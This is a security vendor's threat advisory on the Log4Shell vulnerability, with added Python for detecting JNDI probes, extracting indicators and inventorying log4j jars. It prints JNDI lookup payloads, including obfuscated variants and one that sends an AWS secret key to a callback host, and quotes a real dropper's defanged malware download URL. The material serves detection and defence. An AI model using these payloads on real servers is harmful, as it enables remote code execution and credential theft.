Threat Advisory: Log4j vulnerability (Log4Shell, CVE-2021-44228)

Periodic scans or flow log analysis may not be sufficient for detection or triage of a log4j attack. Continuous and runtime analysis of cloud activity and network activity is essential.

Dr. Saumitra Das, CTO, Blue Hexagon

Overview

Blue Hexagon Labs has confirmed that a disclosed vulnerability in log4j (CVE-2021-44228) is being actively exploited in the wild. The ease with which this vulnerability can be exploited and weaponized makes it a critical issue. Reports point to exploitation several days prior to the widespread publication of the exploit, so attackers may already have gained a significant foothold in victim environments. While initial exploitation starts from external-facing public assets, many internal appliances and software packages also use log4j, which could allow lateral movement. The vulnerability is easy to exploit: Minecraft servers have been compromised using messages typed into the in-game chat. The exploit can also be used to read environment variables, which can leak credentials (e.g. AWS keys) that are in turn usable for lateral movement.

Who is impacted

Servers running versions of Apache Log4j below 2.14.1; the vulnerability does not appear to impact servers running Log4j versions below 2.00.

Conditions conducive to an attack

  • Vulnerable version of log4j
  • Exposed endpoint running log4j that will accept a string-based exploit payload and execute it

How does it work

  • The attacker sends probe requests to identify exposed endpoints
  • Attempts will be made over multiple protocols
  • Once an exposed endpoint is identified, a crafted string containing ${jndi:ldap://attackersIPaddress/ExploitPayload} causes the targeted server to connect to a remote malicious server and fetch a crafted payload. This attack technique is commonly referred to as remote code execution (RCE).

NOTE: Even though we have used LDAP in the example above, the attack is protocol-agnostic and has been seen in the wild over multiple protocols such as HTTP and DNS, and with other modifications to evade signature rules, such as breaking the letters of the lookup or protocol name apart with nested lookup modifiers.

  • Following initial access, post-exploitation activity has so far focused on installing coin-mining ELF binaries on compromised servers. However, since log4j is so widely used in applications and in many IT hardware and software products, attackers could move laterally deeper into a target's environment over time, and we expect other malware used for information theft, disruption or ransomware to follow. Microsoft has already observed attempts to install Cobalt Strike to enable credential theft, lateral movement and data exfiltration.
  • The exploit can also be used to read server environment variables. So credentials such as Git and AWS keys can be stolen without the attacker even obtaining full remote code execution. These credentials can then be used to gain lateral access to other assets. Monitoring cloud API and network activity is an important part of post-exploitation detection and threat hunting.
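The note above says the lookup string is often obfuscated to evade signature rules. As an added example (not code from the advisory or from Blue Hexagon), the following Python detector URL-decodes a request field, resolves the nested lookups Log4j's string substitution supports (`${lower:}`, `${upper:}` and the `:-` default form) from the inside out, and only then checks for the JNDI lookup, so the obfuscated and plain forms are caught alike. The access-log lines, the IP addresses (documentation ranges) and the function names are constructed for the illustration; it also flags when a probe embeds an environment-variable lookup, the credential-theft pattern described in the second bullet.

```python
import re
from urllib.parse import unquote

# Innermost lookup, i.e. one with no further ${...} inside it (e.g. ${lower:j}).
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What an obfuscated probe collapses to once its nested lookups are resolved.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
CALLBACK = re.compile(r"jndi\s*:\s*(\w+)://([^/}\s]+)", re.IGNORECASE)
# env/sys lookups embedded in a probe: used to exfiltrate variables (also, at
# times, as an obfuscation trick), so treat this as a hint, not a verdict.
ENV_LOOKUP = re.compile(r"\$\{\s*(?:env|sys)\s*:", re.IGNORECASE)

# Constructed access-log lines (203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges). Lines 2-4 and 6 carry a JNDI lookup in the User-Agent,
# query string or Referer; line 5 has a ${...} placeholder that is not a lookup.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.13 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://198.51.100.8/c}" "Mozilla/5.0"',
    '203.0.113.14 - - [10/Dec/2021:12:00:05 +0000] "GET /template?name=${user.name} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
    '203.0.113.15 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9/${env:AWS_SECRET_ACCESS_KEY}}"',
]


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup the way Log4j's substitutor would, for the
    lookups that appear in obfuscated probes."""
    if ":-" in body:                      # ${x:-default} or ${::-j}: the default wins
        return body.rsplit(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    return body                           # unknown lookup: keep its text for inspection


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode (twice, for double encoding) and resolve nested lookups from the
    inside out, stopping once only a plain ${jndi:...} remains."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            body = m.group(1)
            if body.lstrip().lower().startswith("jndi:"):
                return m.group(0)         # fully de-obfuscated; leave it in place
            changed = True
            return _resolve(body)

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def is_jndi_probe(text: str) -> bool:
    return JNDI_LOOKUP.search(normalize(text)) is not None


def describe_probe(text: str):
    """None for clean text; otherwise the callback scheme and host:port the
    server would be made to contact, plus whether an env/sys lookup is embedded."""
    normalized = normalize(text)
    if not JNDI_LOOKUP.search(normalized):
        return None
    m = CALLBACK.search(normalized)
    return {
        "scheme": m.group(1).lower() if m else None,
        "callback": m.group(2) if m else None,
        "env_lookup": ENV_LOOKUP.search(unquote(unquote(text))) is not None,
    }


def scan_log(lines):
    """Return one record per log line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = describe_probe(line)
        if found:
            hits.append({"line": number, **found})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The callback host is the value worth pivoting on for hunting: any outbound LDAP, RMI or DNS connection from an application server to that host around the request time confirms the lookup was actually evaluated rather than merely logged.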

Blue Hexagon Coverage

Blue Hexagon can help with detection as well as threat hunting for initial access and for post-exploitation behavior associated with log4j. Monitoring HTTP traffic for exploitation attempts and for downloads of post-exploitation payloads is critical.

Initial access detection requires continuous analysis of network requests to external-facing assets in your environment. Cloud instances deployed as honeypots for log4j have quickly been exploited and infected with coin-mining malware.

Post-exploitation activity currently consists of attempts to install unauthorized coin-mining malware on exploited servers. We expect this to escalate to lateral movement using stolen credentials or direct network access to internal assets running log4j.

Blue Hexagon provides continuous monitoring of your cloud activity and network communication and goes beyond simple flow logs to enable detection and hunting of post-exploitation activity.

Blue Hexagon deep learning models provide coverage for the payloads being used in the wild, such as ELF coin-mining binaries and other kinds of information-stealing malware that are likely to follow and for which no signatures exist.
An example post-exploitation shell script from pastebin shows attempts to kill competing mining services, followed by downloads of malware over HTTP.

BIN_MD5="648effa354b3cbaad87b45f48d59c616"
BIN_DOWNLOAD_URL="hxxp://45.137.155.55/kinsing"
BIN_DOWNLOAD_URL2="hxxp://45.137.155.55/kinsing"

Deep learning models can detect malicious code being downloaded onto affected servers in this manner even when the attacker mutates them to create variants of the IP addresses and the actual malware itself.
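As an added example (not code from the advisory or from Blue Hexagon), the following Python turns a captured script of the kind quoted above into hunting indicators and triages a downloaded file body against them: it parses shell variable assignments, keeps URLs defanged but extracts their hosts, and classifies a download as a known hash, an unknown ELF binary (the case the advisory says needs model-based detection rather than a signature) or something else. The script excerpt is constructed from the three variables the advisory quotes; the function names are assumptions.

```python
import hashlib
import re
from urllib.parse import urlsplit

# Constructed excerpt modelled on the variable block quoted in the advisory;
# the hash and the defanged URL are the ones the advisory lists.
CAPTURED_SCRIPT = """#!/bin/sh
BIN_MD5="648effa354b3cbaad87b45f48d59c616"
BIN_DOWNLOAD_URL="hxxp://45.137.155.55/kinsing"
BIN_DOWNLOAD_URL2="hxxp://45.137.155.55/kinsing"
"""

ASSIGNMENT = re.compile(r'^\s*([A-Z_][A-Z0-9_]*)=["\']?([^"\'\s]+)["\']?\s*$', re.M)
MD5_HEX = re.compile(r"^[0-9a-f]{32}$", re.I)
DEFANGED_URL = re.compile(r"^(?:hxxps?|https?)://", re.I)
ELF_MAGIC = b"\x7fELF"   # first four bytes of every ELF file


def refang(url: str) -> str:
    """Undo the usual defanging so the host can be parsed; internal use only,
    the extracted URL set stays defanged."""
    return re.sub(r"^hxxp", "http", url, flags=re.I).replace("[.]", ".")


def extract_iocs(script_text: str) -> dict:
    """Pull hashes, (defanged) URLs and hosts out of shell variable assignments."""
    iocs = {"md5": set(), "url": set(), "host": set()}
    for _name, value in ASSIGNMENT.findall(script_text):
        if MD5_HEX.match(value):
            iocs["md5"].add(value.lower())
        elif DEFANGED_URL.match(value):
            iocs["url"].add(value)
            iocs["host"].add(urlsplit(refang(value)).hostname)
    return iocs


def classify_download(body: bytes, iocs: dict) -> str:
    """Triage a file body captured from an HTTP download against the IOCs."""
    if hashlib.md5(body).hexdigest() in iocs["md5"]:
        return "known-bad-hash"
    if body.startswith(ELF_MAGIC):
        return "unknown-elf"      # hand to model-based or sandbox analysis
    return "not-elf"


if __name__ == "__main__":
    found = extract_iocs(CAPTURED_SCRIPT)
    print(found)
    print(classify_download(b"\x7fELF" + b"\x00" * 12, found))   # constructed header
```

The host set is the part to feed into network hunting: a connection from an application server to a host first seen in a dropper script is a stronger signal than the hash, which changes with every rebuild of the binary.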

We strongly recommend that customers immediately review their environment for impacted versions of the software called out above and patch to the latest version, starting with external-facing assets and then moving on to the important internal assets.
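Reviewing an environment for impacted versions usually starts with an inventory of log4j-core jars. As an added example (not code from the advisory or from Blue Hexagon), the following Python walks a directory tree, reads the version from each log4j-core jar name, and for pre-fix versions looks inside the jar for `JndiLookup.class`, the class that the Apache-documented mitigation removes. The fix threshold is 2.15.0, the release that closed CVE-2021-44228; Log4j 1.x jars are named `log4j-1.x.y.jar` and are not matched, in line with the advisory's scope. The sample jars are built in memory and the function names are assumptions.

```python
import io
import re
import sys
import zipfile
from pathlib import Path

# Matches log4j-core-2.14.1.jar, log4j-core-2.0-beta9.jar, and so on.
CORE_JAR = re.compile(r"^log4j-core-(\d+)\.(\d+)(?:\.(\d+))?(?:-[A-Za-z0-9]+)?\.jar$")
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_IN = (2, 15, 0)   # first release with CVE-2021-44228 fixed


def parse_version(filename: str):
    """(major, minor, patch) from a log4j-core jar name, or None if it is not one."""
    m = CORE_JAR.match(filename)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def assess_jar(filename: str, jar_bytes: bytes) -> str:
    """Verdict for one jar: name-based version first, then the class check."""
    version = parse_version(filename)
    if version is None:
        return "not-log4j-core"
    if version >= FIXED_IN:
        return "patched"
    try:
        with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
            if JNDI_LOOKUP_CLASS in jar.namelist():
                return "vulnerable"
    except zipfile.BadZipFile:
        return "unreadable-jar"
    return "mitigated-class-removed"   # JndiLookup.class already stripped


def scan_tree(root) -> dict:
    """Map every log4j-core jar under root to its assessment."""
    return {str(p): assess_jar(p.name, p.read_bytes())
            for p in Path(root).rglob("log4j-core-*.jar")}


def make_jar(entries) -> bytes:
    """Build a minimal jar in memory with the given entry names (constructed samples only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        for name in entries:
            jar.writestr(name, b"")
    return buf.getvalue()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_tree(sys.argv[1])          # real scan of the given directory
    else:
        import tempfile                            # demo on constructed jars
        with tempfile.TemporaryDirectory() as tmp:
            lib = Path(tmp) / "app" / "lib"
            lib.mkdir(parents=True)
            (lib / "log4j-core-2.14.1.jar").write_bytes(make_jar([JNDI_LOOKUP_CLASS]))
            (lib / "log4j-core-2.17.1.jar").write_bytes(make_jar([JNDI_LOOKUP_CLASS]))
            results = scan_tree(tmp)
    for path, verdict in sorted(results.items()):
        print(f"{verdict:24} {path}")
```

Two caveats a practitioner should keep in mind: the jar name is only a hint, so a jar renamed or shaded into a fat application jar will not be found by this walk and needs a content scan instead; and "patched" here means not affected by CVE-2021-44228 only, since later Log4j advisories raised the recommended version further.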

We are monitoring the events closely to ensure that we maximize coverage, detection and protection.

Is Blue Hexagon Vulnerable?

No. Blue Hexagon's security software does not use log4j, has no open network accessibility, and is not intended to be deployed with external network access. Blue Hexagon's Detection and Threat Hunting portal does not use log4j either.

References and Useful IOCs